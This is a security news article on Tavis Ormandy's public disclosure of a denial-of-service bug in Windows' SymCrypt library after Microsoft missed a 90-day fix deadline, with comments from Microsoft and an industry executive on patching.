“I noticed a bug in SymCrypt, the core library that handles all crypto on Windows. It's a DoS, but this means basically anything that does crypto in Windows can be deadlocked (s/mime, authenticode, ipsec, iis, everything). Microsoft committed to fixing it in 90 days, then didn't,” Ormandy tweeted.

Now that we’ve entered into the 91st day, Ormandy has gone public with what he said is a relatively low severity bug. “I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g., ipsec, iis, exchange, etc.) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock,” Ormandy wrote in the Project Zero vulnerability report.

Ormandy noted that while it is a low-severity bug, it would be possibly to take down an entire Windows fleet relatively quickly if exploited. “Microsoft has a customer commitment to investigate reported security issues and provide updates as soon as possible. We worked to meet the researcher’s deadline for disclosure; however, a customer-impacting regression was discovered that prevented the update from being released on schedule,We advised the researcher of the delay as soon as we were able. Developing a security update is a delicate balance between timeliness and quality, and our ultimate goal is to help ensure maximum customer protection with minimal customer disruption," a Microsoft spokesperson wrote in an email.*  

"This finding demonstrates just how important this type of research is in helping organizations mitigate risks no one ever knew existed. The frightening part about this vulnerability and others that can be remedied with a simple patch, however, is that many organizations will have a very difficult time actually implementing the fix,” said Adam Laub, SVP product management, STEALTHbits Technologies.

“When I first started in the industry nearly 15 years ago, patch management was very much the flavor of the day – much like privileged access management (PAM) and artificial intelligence (AI) technologies command significant mind share among security practitioners now. Sadly, the patch management problem persists despite advances in so many other areas of IT management, which could make this 'low severity' vulnerability a lot more pungent than it ought to be."

*June 12, 2019 3:38 PM: This article was updated to include comment from a Microsoft spokesperson.

Categories: Cyber Risk News

Pages